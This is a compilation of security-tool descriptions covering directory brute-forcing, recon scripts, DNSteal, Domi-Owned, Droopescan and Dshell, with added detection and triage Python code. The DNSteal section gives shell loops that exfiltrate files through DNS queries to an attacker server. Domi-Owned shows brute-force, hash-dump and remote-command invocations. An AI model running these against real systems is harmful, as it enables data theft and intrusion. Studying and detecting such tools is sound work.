    python3 dirs3arch.py -u http://www.example.com/admin/ -e php -r
  • Scan recursively excluding server-status directory and 200 status codes:
    python3 dirs3arch.py -u http://www.example.com/ -e php -r --exclude-subdir "server-status" --exclude-status 200
  • Scan the includes and classes directories in /admin/:
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --scan-subdir "includes, classes"
  • Scan without following HTTP redirects:
    python3 dirs3arch.py -u http://www.example.com/ -e php --no-follow-redirects
  • Scan VHOST "backend" at IP 192.168.1.1:
    python3 dirs3arch.py -u http://backend/ --ip 192.168.1.1
  • Scan www.example.com to find wordpress plugins:
    python3 dirs3arch.py -u http://www.example.com/wordpress/wp-content/plugins/ -e php -w db/wordpress/plugins.txt

  • Batch processing:
    python3 dirs3arch.py -L urllist.txt -e php


Thirdparty code
  • colorama
  • oset
  • urllib3
  • sqlmap

Changelog
  • 0.3.0 - 2015.2.5 Fixed issue3, fixed timeout exception, ported to python33, other bugfixes
  • 0.2.7 - 2014.11.21 Added Url List feature (-L). Changed output. Minor Fixes
  • 0.2.6 - 2014.9.12 Fixed bug when dictionary size is greater than threads count. Fixed URL encoding bug (issue2).
  • 0.2.5 - 2014.9.2 Shows Content-Length in output and reports, added default.conf file (for setting defaults) and report auto save feature added.
  • 0.2.4 - 2014.7.17 Added Windows support, --scan-subdir|--scan-subdirs argument added, --exclude-subdir|--exclude-subdirs added, --header argument added, dirbuster dictionaries added, fixed some concurrency bugs, MVC refactoring
  • 0.2.3 - 2014.7.7 Fixed some bugs, minor refactorings, exclude status switch, "pause/next directory" feature, changed help structure, expanded default dictionary
  • 0.2.2 - 2014.7.2 Fixed some bugs, showing percentage of tested paths and added report generation feature
  • 0.2.1 - 2014.5.1 Fixed some bugs and added recursive option
  • 0.2.0 - 2014.1.31 Initial public release

Discover - Custom bash scripts used to automate various pentesting tasks


For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.

Download, setup & usage
  • git clone git://github.com/leebaird/discover.git /opt/discover/
  • All scripts must be run from this location.
  • cd /opt/discover/
  • ./setup.sh
  • ./discover.sh
RECON
1.  Domain
2.  Person
3.  Parse salesforce

SCANNING
4.  Generate target list
5.  CIDR
6.  List
7.  IP or domain

WEB
8.  Open multiple tabs in Iceweasel
9.  Nikto
10. SSL

MISC
11. Crack WiFi
12. Parse XML
13. Start a Metasploit listener
14. Update
15. Exit

RECON

Domain
RECON

1.  Passive
2.  Active
3.  Previous menu
  • Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple websites.
  • Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.

Person
RECON

First name:
Last name:
  • Combines info from multiple websites.

Parse salesforce
Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.

Enter the location of your list: 
  • Gather names and positions into a clean list.

SCANNING

Generate target list
SCANNING

1.  Local area network
2.  NetBIOS
3.  netdiscover
4.  Ping sweep
5.  Previous menu
  • Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.

CIDR, List, IP or domain
Type of scan: 

1.  External
2.  Internal
3.  Previous menu
  • External scan will set the nmap source port to 53 and the max-rtt-timeout to 1500ms.
  • Internal scan will set the nmap source port to 88 and the max-rtt-timeout to 500ms.
  • Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
  • Matching nmap scripts are used for additional enumeration.
  • Matching Metasploit auxiliary modules are also leveraged.

WEB

Open multiple tabs in Iceweasel
Open multiple tabs in Iceweasel with:

1.  List
2.  Directories from a domain's robots.txt.
3.  Previous menu
  • Use a list containing IPs and/or URLs.
  • Use wget to pull a domain's robots.txt file, then open all of the directories.

Nikto
Run multiple instances of Nikto in parallel.

1.  List of IPs.
2.  List of IP:port.
3.  Previous menu

SSL
Check for SSL certificate issues.

Enter the location of your list: 
  • Use sslscan and sslyze to check for SSL/TLS certificate issues.

MISC

Crack WiFi
  • Crack wireless networks.

Parse XML
Parse XML to CSV.

1.  Burp (Base64)
2.  Nessus
3.  Nexpose
4.  Nmap
5.  Qualys
6.  Previous menu

Start a Metasploit listener
  • Set up a multi/handler with a windows/meterpreter/reverse_tcp payload on port 443.

Update
  • Use to update Kali Linux, Discover scripts, various tools and the locate database.


Download Discover

DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Below is an image showing an example of how to use:


On the victim machine, you simply can do something like so:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
Support for multiple files:
for filename in $(ls); do for b in $(xxd -p $filename); do dig +short @server $b.$filename.com; done; done
gzip compression supported
It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:
python dnsteal.py 127.0.0.1 -z
Then on the victim machine send a Gzipped file like so:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
or for multiple, gzip compressed files:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename.com; done; done
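From the defender's side, the loops above leave a distinctive footprint: a burst of queries from one client whose first label is a long, even-length hex string (xxd -p emits 60 hex characters per line) under the same parent domain, starting with 1f8b when the -z gzip option is used. The following added example (not part of dnsteal) runs that check over constructed resolver log lines in an assumed "timestamp client qname qtype" format and reassembles what a flagged stream carried.

```python
"""Detect DNSteal-style hex exfiltration in DNS query logs (added example)."""
import gzip
import re

# Constructed log format (an assumption; adapt LOG_RE to your resolver's logs):
#   <timestamp> <client-ip> <query-name> <query-type>
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")
HEX_RE = re.compile(r"^[0-9a-f]+$")
GZIP_MAGIC = b"\x1f\x8b"  # what a `gzip -c ... | xxd -p` stream starts with


def parse_query(line):
    """Return (client, qname) for a log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return m.group(2), m.group(3).rstrip(".").lower()


def hex_chunk(qname):
    """Split qname into (hex_label, parent) if its first label is a hex chunk.

    Each `dig $b.filename.com` query carries one even-length hex label
    (up to 60 chars from xxd -p) in front of the attacker's domain.
    """
    first, _, parent = qname.partition(".")
    if parent and len(first) % 2 == 0 and HEX_RE.match(first):
        return first, parent
    return None


def analyse(lines, min_queries=5, min_mean_len=32):
    """Group hex-labelled queries per (client, parent domain) and flag streams.

    A stream is reported when it has at least min_queries queries and the mean
    label length is at least min_mean_len, so short hex-looking labels such as
    'cafe' or 'deadbeef' are ignored. Chunks are reassembled in log order,
    which is the order the victim loop sends them.
    """
    streams = {}
    for line in lines:
        parsed = parse_query(line)
        if parsed is None:
            continue
        client, qname = parsed
        chunk = hex_chunk(qname)
        if chunk is None:
            continue
        label, parent = chunk
        streams.setdefault((client, parent), []).append(label)

    findings = []
    for (client, parent), labels in streams.items():
        mean_len = sum(len(label) for label in labels) / len(labels)
        if len(labels) < min_queries or mean_len < min_mean_len:
            continue
        payload = bytes.fromhex("".join(labels))
        findings.append({
            "client": client,
            "domain": parent,
            "queries": len(labels),
            "payload": payload,
            "gzip": payload.startswith(GZIP_MAGIC),
        })
    return findings


def constructed_exfil_lines(data, domain, client, ts="2015-03-01T10:00:00"):
    """Build log lines like those the page's dig loop would produce (test data only)."""
    hexdata = data.hex()  # same lowercase hex as xxd -p
    return ["%s %s %s.%s A" % (ts, client, hexdata[i:i + 60], domain)
            for i in range(0, len(hexdata), 60)]


BENIGN_LINES = [  # constructed, not real traffic
    "2015-03-01T09:59:58 10.0.0.5 www.example.com A",
    "2015-03-01T09:59:59 10.0.0.5 cafe.example.net A",
] + ["2015-03-01T10:00:0%d 10.0.0.9 deadbeef.example.org A" % i for i in range(6)]


if __name__ == "__main__":
    sample = bytes(range(256)) * 2  # constructed 512-byte "document"
    lines = BENIGN_LINES + constructed_exfil_lines(sample, "filename.com", "10.0.0.5")
    for f in analyse(lines):
        print("%s -> %s: %d queries, %d bytes, gzip=%s"
              % (f["client"], f["domain"], f["queries"], len(f["payload"]), f["gzip"]))
```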


Download DNSteal

Domi-Owned - Tool Used for Compromising IBM/Lotus Domino Servers


Domi-Owned is a tool used for compromising IBM/Lotus Domino servers.
Tested on IBM/Lotus Domino 8.5.2, 8.5.3, 9.0.0, and 9.0.1 running on Windows and Linux.

Usage

A valid username and password are not required unless 'names.nsf' and/or 'webadmin.nsf' requires authentication.

Fingerprinting

Running Domi-Owned with just the --url flag will attempt to identify the Domino server version, as well as check if 'names.nsf' and 'webadmin.nsf' require authentication.
If a username and password are given, Domi-Owned will check to see if that account can access 'names.nsf' and 'webadmin.nsf' with those credentials.

Reverse Bruteforce

To perform a reverse bruteforce attack against a Domino server, specify a file containing a list of usernames with -U, a password with -p, and the --bruteforce flag. Domi-Owned will then try to authenticate to 'names.nsf', returning successful accounts.

Dump Hashes

To dump all Domino accounts with a non-empty hash from 'names.nsf', run Domi-Owned with the --hashdump flag. This prints the results to the screen and writes them to separate output files depending on the hash type (Domino 5, Domino 6, Domino 8).

Quick Console

The Domino Quick Console is active by default; however, it will not show the command's output. A workaround for this problem is to redirect the command output to a file, in this case 'log.txt', that is then displayed as a web page on the Domino server.
If the --quickconsole flag is given, Domi-Owned will access the Domino Quick Console through 'webadmin.nsf', allowing the user to issue native Windows or Linux commands. Domi-Owned will then retrieve the output of the command and display the results in real time through a command line interpreter. Type exit to quit the Quick Console interpreter, which will also delete the 'log.txt' output file.

Examples

Fingerprint Domino server

python domi-owned.py --url http://domino-server.com

Perform a reverse bruteforce attack

python domi-owned.py --url http://domino-server.com -U ./usernames.txt -p password --bruteforce

Dump Domino account hashes

python domi-owned.py --url http://domino-server.com -u user -p password --hashdump

Interact with the Domino Quick Console

python domi-owned.py --url http://domino-server.com -u user -p password --quickconsole


Download Domi-Owned

Double the bang for your buck with Acunetix Vulnerability Scanner


Acunetix have announced that they are extending their current free offering of the network security scan, part of their cloud-based web and network vulnerability scanner. Those signing up for a trial of the online version of Acunetix vulnerability scanner will now be able to scan their perimeter servers for network security issues on up to 3 targets with no expiry.

In addition, existing Acunetix customers will also be able to double up on their current license-based quota of scan targets by adding the same amount of network scans, i.e. a 25 scan target license can now make use of an extra 25 network-only scan targets for free.

An analysis of scans performed over the past year following the launch of Acunetix Vulnerability Scanner (online version) shows that on average 50% of the targets scanned have a medium or high network security vulnerability. It’s worrying that in the current cybersecurity climate, network devices remain vulnerable to attack. The repercussions of a vulnerable network are catastrophic, as seen in some recent, well publicised attacks by Lizard Squad, the black hat hacking group mainly known for their claims of DoS attacks.

“Acunetix secure the websites of some of the biggest global enterprises, and with our online vulnerability scanner we are not only bringing this technology within reach of many more businesses but we are also providing free network security scanning technology to aid smaller companies secure their network,” said Nick Galea, CEO of Acunetix.

How Acunetix keeps perimeter servers secure

A network security scan checks the perimeter servers, locating any vulnerabilities in the operating system, server software, network services and protocols. Acunetix network security scan uses the OpenVAS database of network vulnerabilities and scans for more than 35,000 network level vulnerabilities. A network scan is where vulnerabilities such as Shellshock, Heartbleed and POODLE are detected, vulnerabilities which continue to plague not only web servers but also a large percentage of other network servers. A network scan will also:
  • Detect misconfigurations and vulnerabilities in OS, server applications, network services, and protocols
  • Assess security of detected devices (routers, hardware firewalls, switches and printers)
  • Scan for trojans, backdoors, rootkits, and other malware that can be detected remotely
  • Test for weak passwords on FTP, IMAP, SQL servers, POP3, Socks, SSH, Telnet
  • Check for DNS server vulnerabilities such as Open Zone Transfer, Open Recursion and Cache Poisoning
  • Test FTP access such as anonymous access potential and a list of writable FTP directories
  • Check for badly configured Proxy Servers, weak SNMP Community Strings, weak SSL ciphers and many other security weaknesses.

Register for a free trial and start scanning http://www.acunetix.com/free-network-security-scanner/ 

About Acunetix

Acunetix is the market leader in web application security technology, founded to combat the alarming rise in web attacks. Its products and technologies are the result of a decade of work by a team of highly experienced security developers. Acunetix’ customers include the U.S. Army, KPMG, Adidas and Fujitsu. More information can be found at www.acunetix.com.


Droopescan - Scanner to identify issues with several CMSs, mainly Drupal & Silverstripe


A plugin-based scanner that aids security researchers in identifying issues with several CMSs:
  • Drupal.
  • SilverStripe.
Partial functionality for:
  • Wordpress.
  • Joomla.
computer:~/droopescan$ droopescan scan drupal -u http://example.org/ -t 8
[+] No themes found.

[+] Possible interesting urls found:
    Default changelog file - https://www.example.org/CHANGELOG.txt
    Default admin - https://www.example.org/user/login

[+] Possible version(s):
    7.34

[+] Plugins found:
    views https://www.example.org/sites/all/modules/views/
        https://www.example.org/sites/all/modules/views/README.txt
        https://www.example.org/sites/all/modules/views/LICENSE.txt
    token https://www.example.org/sites/all/modules/token/
        https://www.example.org/sites/all/modules/token/README.txt
        https://www.example.org/sites/all/modules/token/LICENSE.txt
    pathauto https://www.example.org/sites/all/modules/pathauto/
        https://www.example.org/sites/all/modules/pathauto/README.txt
        https://www.example.org/sites/all/modules/pathauto/LICENSE.txt
        https://www.example.org/sites/all/modules/pathauto/API.txt
    libraries https://www.example.org/sites/all/modules/libraries/
        https://www.example.org/sites/all/modules/libraries/CHANGELOG.txt
        https://www.example.org/sites/all/modules/libraries/README.txt
        https://www.example.org/sites/all/modules/libraries/LICENSE.txt
    entity https://www.example.org/sites/all/modules/entity/
        https://www.example.org/sites/all/modules/entity/README.txt
        https://www.example.org/sites/all/modules/entity/LICENSE.txt
    google_analytics https://www.example.org/sites/all/modules/google_analytics/
        https://www.example.org/sites/all/modules/google_analytics/README.txt
        https://www.example.org/sites/all/modules/google_analytics/LICENSE.txt
    ctools https://www.example.org/sites/all/modules/ctools/
        https://www.example.org/sites/all/modules/ctools/CHANGELOG.txt
        https://www.example.org/sites/all/modules/ctools/LICENSE.txt
        https://www.example.org/sites/all/modules/ctools/API.txt
    features https://www.example.org/sites/all/modules/features/
        https://www.example.org/sites/all/modules/features/CHANGELOG.txt
        https://www.example.org/sites/all/modules/features/README.txt
        https://www.example.org/sites/all/modules/features/LICENSE.txt
        https://www.example.org/sites/all/modules/features/API.txt
    [... snip for README ...]

[+] Scan finished (0:04:59.502427 elapsed)
You can get a full list of options by running:
droopescan --help
droopescan scan --help

Why not X?

Because droopescan:
  • is fast
  • is stable
  • is up to date
  • allows simultaneous scanning of multiple sites
  • is 100% python
Installation

Installation is easy using pip:
apt-get install python-pip
pip install droopescan

Manual installation is as follows:
git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt
droopescan scan --help
The master branch corresponds to the latest release (what is in pypi). Development branch is unstable and all pull requests must be made against it. More notes regarding installation can be found here.

Features

Scan types.

Droopescan aims to be the most accurate by default, while not overloading the target server due to excessive concurrent requests. Due to this, by default, a large number of requests will be made with four threads; change these settings by using the --number and --threads arguments respectively.

This tool is able to perform four kinds of tests. By default all tests are run, but you can specify one of the following with the -e or --enumerate flag:
  • p -- Plugin checks: Performs several thousand HTTP requests and returns a listing of all plugins found to be installed in the target host.
  • t -- Theme checks: As above, but for themes.
  • v -- Version checks: Downloads several files and, based on the checksums of these files, returns a list of all possible versions.
  • i -- Interesting url checks: Checks for interesting urls (admin panels, readme files, etc.)
More notes regarding scanning can be found here.

Target specification

You can specify a particular host to scan by passing the -u or --url parameter:
    droopescan scan drupal -u example.org
You can also omit the drupal argument. This will trigger “CMS identification”, like so:
    droopescan scan -u example.org
Multiple URLs may be scanned utilising the -U or --url-file parameter. This parameter should be set to the path of a file which contains a list of URLs.
    droopescan scan drupal -U list_of_urls.txt
The drupal parameter may also be omitted in this example. For each site, it will make several GET requests in order to perform CMS identification, and if the site is deemed to be a supported CMS, it is scanned and added to the output list. This can be useful, for example, to run droopescan across all your organisation's sites.
    droopescan scan -U list_of_urls.txt
The code block below contains an example list of URLs, one per line:
http://localhost/drupal/6.0/
http://localhost/drupal/6.1/
http://localhost/drupal/6.10/
http://localhost/drupal/6.11/
http://localhost/drupal/6.12/
A URL file may also contain, on each line, a URL followed by a value to override the default Host header with, separated by tabs or spaces. This can be handy when conducting a scan through a large range of hosts and you want to prevent unnecessary DNS queries. To clarify, an example below:
192.168.1.1 example.org
http://192.168.1.1/ example.org
http://192.168.1.2/drupal/  example.org
It is quite tempting to test whether the scanner works for a particular CMS by scanning the official site (e.g. wordpress.org for wordpress), but the official sites rarely run vanilla installations of their respective CMS, or they do unorthodox things. For example, wordpress.org runs the bleeding edge version of wordpress, which will not be identified as wordpress by droopescan at all because the checksums do not match any known wordpress version.

Authentication

The application fully supports .netrc files and http_proxy environment variables.

You can set the http_proxy and https_proxy variables. These allow you to set a parent HTTP proxy, in which you can handle more complex types of authentication (e.g. Fiddler, ZAP, Burp)
export http_proxy='user:password@localhost:8080'
export https_proxy='user:password@localhost:8080'
droopescan scan drupal --url http://localhost/drupal
Another option is to use a .netrc file for basic authentication. An example ~/.netrc file could look as follows:
machine secret.google.com
    login admin@google.com
    password Winter01
WARNING: By design, to allow intercepting proxies and the testing of applications with bad SSL, droopescan allows self-signed or otherwise invalid certificates. ˙ ͜ʟ˙

Output

This application supports both "standard output", meant for human consumption, and JSON, which is more suitable for machine consumption. This output is stable between major versions.
This can be controlled with the --output flag. Some sample JSON output would look as follows (minus the excessive whitespace):
{
  "themes": {
    "is_empty": true,
    "finds": [

    ]
  },
  "interesting urls": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/CHANGELOG.txt",
        "description": "Default changelog file."
      },
      {
        "url": "https:\/\/www.drupal.org\/user\/login",
        "description": "Default admin."
      }
    ]
  },
  "version": {
    "is_empty": false,
    "finds": [
      "7.29",
      "7.30",
      "7.31"
    ]
  },
  "plugins": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/sites\/all\/modules\/views\/",
        "name": "views"
      },
      [...snip...]
    ]
  }
}
Some attributes might be missing from the JSON object if parts of the scan are not run.
This is what multi-site output looks like; each line contains a valid JSON object as shown above.

    $ droopescan scan drupal -U six_and_above.txt -e v
    {"host": "http://localhost/drupal-7.6/", "version": {"is_empty": false, "finds": ["7.6"]}}
    {"host": "http://localhost/drupal-7.7/", "version": {"is_empty": false, "finds": ["7.7"]}}
    {"host": "http://localhost/drupal-7.8/", "version": {"is_empty": false, "finds": ["7.8"]}}
    {"host": "http://localhost/drupal-7.9/", "version": {"is_empty": false, "finds": ["7.9"]}}
    {"host": "http://localhost/drupal-7.10/", "version": {"is_empty": false, "finds": ["7.10"]}}
    {"host": "http://localhost/drupal-7.11/", "version": {"is_empty": false, "finds": ["7.11"]}}
    {"host": "http://localhost/drupal-7.12/", "version": {"is_empty": false, "finds": ["7.12"]}}
    {"host": "http://localhost/drupal-7.13/", "version": {"is_empty": false, "finds": ["7.13"]}}
    {"host": "http://localhost/drupal-7.14/", "version": {"is_empty": false, "finds": ["7.14"]}}
    {"host": "http://localhost/drupal-7.15/", "version": {"is_empty": false, "finds": ["7.15"]}}
    {"host": "http://localhost/drupal-7.16/", "version": {"is_empty": false, "finds": ["7.16"]}}
    {"host": "http://localhost/drupal-7.17/", "version": {"is_empty": false, "finds": ["7.17"]}}
    {"host": "http://localhost/drupal-7.18/", "version": {"is_empty": false, "finds": ["7.18"]}}
    {"host": "http://localhost/drupal-7.19/", "version": {"is_empty": false, "finds": ["7.19"]}}
    {"host": "http://localhost/drupal-7.20/", "version": {"is_empty": false, "finds": ["7.20"]}}
    {"host": "http://localhost/drupal-7.21/", "version": {"is_empty": false, "finds": ["7.21"]}}
    {"host": "http://localhost/drupal-7.22/", "version": {"is_empty": false, "finds": ["7.22"]}}
    {"host": "http://localhost/drupal-7.23/", "version": {"is_empty": false, "finds": ["7.23"]}}
    {"host": "http://localhost/drupal-7.24/", "version": {"is_empty": false, "finds": ["7.24"]}}
    {"host": "http://localhost/drupal-7.25/", "version": {"is_empty": false, "finds": ["7.25"]}}
    {"host": "http://localhost/drupal-7.26/", "version": {"is_empty": false, "finds": ["7.26"]}}
    {"host": "http://localhost/drupal-7.27/", "version": {"is_empty": false, "finds": ["7.27"]}}
    {"host": "http://localhost/drupal-7.28/", "version": {"is_empty": false, "finds": ["7.28"]}}
    {"host": "http://localhost/drupal-7.29/", "version": {"is_empty": false, "finds": ["7.29"]}}
    {"host": "http://localhost/drupal-7.30/", "version": {"is_empty": false, "finds": ["7.30"]}}
    {"host": "http://localhost/drupal-7.31/", "version": {"is_empty": false, "finds": ["7.31"]}}
    {"host": "http://localhost/drupal-7.32/", "version": {"is_empty": false, "finds": ["7.32"]}}
    {"host": "http://localhost/drupal-7.33/", "version": {"is_empty": false, "finds": ["7.33"]}}
    {"host": "http://localhost/drupal-7.34/", "version": {"is_empty": false, "finds": ["7.34"]}}
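Because every line of the multi-site output is a self-contained JSON object, it can be fed straight into a triage script. The Python below is an added example, not part of droopescan: it reads JSON-lines output from a constructed sample, flags hosts where at least one candidate version is below a baseline (the version check returns every version the checksums are consistent with, so the lowest candidate is the conservative answer), and lists exposed .txt files reported by the interesting-URL check. The sample hosts, versions and URLs are made up.

```python
"""Triage droopescan multi-site output (one JSON object per line). Added example."""
import json
from typing import Dict, List, Tuple

# Constructed sample of multi-site output; hosts and findings are invented.
SAMPLE_OUTPUT = """\
{"host": "http://localhost/drupal-7.30/", "version": {"is_empty": false, "finds": ["7.29", "7.30", "7.31"]}, "interesting urls": {"is_empty": false, "finds": [{"url": "http://localhost/drupal-7.30/CHANGELOG.txt", "description": "Default changelog file."}]}}
{"host": "http://localhost/drupal-7.34/", "version": {"is_empty": false, "finds": ["7.34"]}, "interesting urls": {"is_empty": true, "finds": []}}
{"host": "http://localhost/site-x/", "version": {"is_empty": true, "finds": []}}
"""


def version_key(version: str) -> Tuple[int, ...]:
    """Turn '7.30' into (7, 30) so versions compare numerically, not lexically."""
    return tuple(int(part) for part in version.split("."))


def load_results(text: str) -> List[dict]:
    """Parse JSON-lines output: one object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def triage_host(result: dict, minimum: str) -> Dict[str, object]:
    """Summarise one host.

    outdated is True when at least one candidate version is older than `minimum`
    (the scan could not rule an old version out), False when every candidate is
    at or above it, and None when version detection found nothing.
    Keys such as "plugins" or "themes" may be absent if those checks were not run,
    so every lookup uses .get() with an empty default.
    """
    versions = result.get("version", {}).get("finds", [])
    if versions:
        outdated = min(version_key(v) for v in versions) < version_key(minimum)
    else:
        outdated = None
    urls = result.get("interesting urls", {}).get("finds", [])
    exposed = [u["url"].rsplit("/", 1)[-1] for u in urls if u["url"].endswith(".txt")]
    return {
        "host": result["host"],
        "versions": sorted(versions, key=version_key),
        "outdated": outdated,
        "exposed_files": exposed,
    }


def triage(text: str, minimum: str) -> List[Dict[str, object]]:
    return [triage_host(r, minimum) for r in load_results(text)]


def needs_attention(text: str, minimum: str) -> List[str]:
    """Hosts that may be outdated, could not be versioned, or expose metadata files."""
    return [
        row["host"]
        for row in triage(text, minimum)
        if row["outdated"] is not False or row["exposed_files"]
    ]


if __name__ == "__main__":
    for row in triage(SAMPLE_OUTPUT, "7.31"):
        print(row)
```

Run it against a real scan with `droopescan scan drupal -U hosts.txt --output json > out.jsonl` and pass the file contents to triage(); the baseline version is whatever your patch policy requires.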


Download Droopescan

Dshell - Network Forensic Analysis Framework


An extensible network forensic analysis framework. Enables rapid development of plugins to support the dissection of network packet captures.

Key features:
  • Robust stream reassembly
  • IPv4 and IPv6 support
  • Custom output handlers
  • Chainable decoders

Prerequisites

Python modules: PyCrypto, dpkt, IPy, pypcap and pygeoip (the packages the install commands below pull in).

Installation
  1. Install all of the necessary Python modules listed above. Many of them are available via pip and/or apt-get. Pygeoip is not yet available as a distribution package and must be installed with pip or manually. All except dpkt are available with pip.
    1. sudo apt-get install python-crypto python-dpkt python-ipy python-pypcap
    2. sudo pip install pygeoip
  2. Configure pygeoip by moving the MaxMind data files (GeoIP.dat, GeoIPv6.dat, GeoIPASNum.dat, GeoIPASNumv6.dat) into share/GeoIP/ inside the Dshell directory (the path is relative to the checkout, not the filesystem root).
  3. Run make. This will build Dshell.
  4. Run ./dshell. This is Dshell. If you get a Dshell> prompt, you're good to go!

Basic usage
  • decode -l
    • This will list all available decoders alongside basic information about them
  • decode -h
    • Show generic command-line flags available to most decoders
  • decode -d <decoder>
    • Display information about a decoder, including available command-line flags
  • decode -d <decoder> <pcap>
    • Run the selected decoder on a pcap file

Usage Examples

Showing DNS lookups in sample traffic
Dshell> decode -d dns ~/pcap/dns.cap
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 39867 PTR? 66.192.9.104 / PTR: 66-192-9-104.gen.twtelecom.net **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 30144 A? www.netbsd.org / A: 204.152.190.12 (ttl 82159s) **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 61652 AAAA? www.netbsd.org / AAAA: 2001:4f8:4:7:2e0:81ff:fe52:9a6b (ttl 86400s) **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 32569 AAAA? www.netbsd.org / AAAA: 2001:4f8:4:7:2e0:81ff:fe52:9a6b (ttl 86340s) **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 36275 AAAA? www.google.com / CNAME: www.l.google.com **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 9837 AAAA? www.example.notginh / NXDOMAIN **
dns 2005-03-30 03:52:17    192.168.170.8:32796 <-   192.168.170.20:53    ** 23123 PTR? 127.0.0.1 / PTR: localhost **
dns 2005-03-30 03:52:25   192.168.170.56:1711  <-      217.13.4.24:53    ** 30307 A? GRIMM.utelsystems.local / NXDOMAIN **
dns 2005-03-30 03:52:17   192.168.170.56:1710  <-      217.13.4.24:53    ** 53344 A? GRIMM.utelsystems.local / NXDOMAIN **
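The dns decoder output above has a regular shape that detection logic can consume directly. The Python below is an added example, not part of Dshell: it parses those lines (the sample is the page's own output, trimmed to six lines) and reports clients with repeated NXDOMAIN answers, a cheap indicator for misconfigured hosts or DGA-style lookups. It assumes the left-hand endpoint is always the resolver client, which holds for the sample whichever way the arrow points.

```python
"""Parse Dshell `decode -d dns` output and flag NXDOMAIN-heavy clients. Added example."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Six lines taken from the page's dns decoder output (sample pcap traffic).
SAMPLE_DNS_OUTPUT = """\
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 39867 PTR? 66.192.9.104 / PTR: 66-192-9-104.gen.twtelecom.net **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 30144 A? www.netbsd.org / A: 204.152.190.12 (ttl 82159s) **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 9837 AAAA? www.example.notginh / NXDOMAIN **
dns 2005-03-30 03:52:17    192.168.170.8:32796 <-   192.168.170.20:53    ** 23123 PTR? 127.0.0.1 / PTR: localhost **
dns 2005-03-30 03:52:25   192.168.170.56:1711  <-      217.13.4.24:53    ** 30307 A? GRIMM.utelsystems.local / NXDOMAIN **
dns 2005-03-30 03:52:17   192.168.170.56:1710  <-      217.13.4.24:53    ** 53344 A? GRIMM.utelsystems.local / NXDOMAIN **
"""

# decoder  timestamp  client:port  arrow  server:port  ** txid TYPE? name / answer **
LINE_RE = re.compile(
    r"^dns (?P<ts>\S+ \S+)\s+"
    r"(?P<client>[0-9a-fA-F.:]+):(?P<cport>\d+)\s+(?:->|<-)\s+"
    r"(?P<server>[0-9a-fA-F.:]+):(?P<sport>\d+)\s+"
    r"\*\* (?P<txid>\d+) (?P<qtype>[A-Z]+)\? (?P<qname>\S+) / (?P<answer>.*?) \*\*$"
)


@dataclass
class DnsRecord:
    ts: str
    client: str
    server: str
    txid: int
    qtype: str
    qname: str
    answer: str

    @property
    def nxdomain(self) -> bool:
        return self.answer == "NXDOMAIN"


def parse_dns_output(text: str) -> List[DnsRecord]:
    """Parse decoder lines; lines that do not match (banners, other decoders) are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if not m:
            continue
        records.append(DnsRecord(m["ts"], m["client"], m["server"], int(m["txid"]),
                                 m["qtype"], m["qname"], m["answer"]))
    return records


def nxdomain_by_client(records: List[DnsRecord]) -> Dict[str, List[str]]:
    """Map each client IP to the names it asked for that did not exist."""
    out: Dict[str, List[str]] = defaultdict(list)
    for r in records:
        if r.nxdomain:
            out[r.client].append(r.qname)
    return dict(out)


def suspicious_clients(records: List[DnsRecord], threshold: int = 2) -> List[str]:
    """Clients with at least `threshold` NXDOMAIN answers, sorted for stable output."""
    return sorted(c for c, names in nxdomain_by_client(records).items() if len(names) >= threshold)


if __name__ == "__main__":
    recs = parse_dns_output(SAMPLE_DNS_OUTPUT)
    for client, names in nxdomain_by_client(recs).items():
        print(f"{client}: {len(names)} NXDOMAIN ({', '.join(sorted(set(names)))})")
    print("suspicious:", suspicious_clients(recs))
```

In practice you would pipe `decode -d dns capture.pcap` into this and raise the threshold to suit the network; a workstation hammering a resolver with dozens of distinct non-existent names in a minute is the pattern worth a second look.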
Following and reassembling a stream in sample traffic
Dshell> decode -d followstream ~/pcap/v6-http.cap
Connection 1 (TCP)
Start: 2007-08-05 19:16:44.189852 UTC
  End: 2007-08-05 19:16:44.204687 UTC
2001:6f8:102d:0:2d0:9ff:fee3:e8de:59201 -> 2001:6f8:900:7c0::2:80 (240 bytes)
2001:6f8:900:7c0::2:80 -> 2001:6f8:102d:0:2d0:9ff:fee3:e8de:59201 (2259 bytes)

GET / HTTP/1.0
Host: cl-1985.ham-01.de.sixxs.net
Accept: text/html, text/plain, text/css, text/sgml, */*;q=0.01
Accept-Encoding: gzip, bzip2
Accept-Language: en
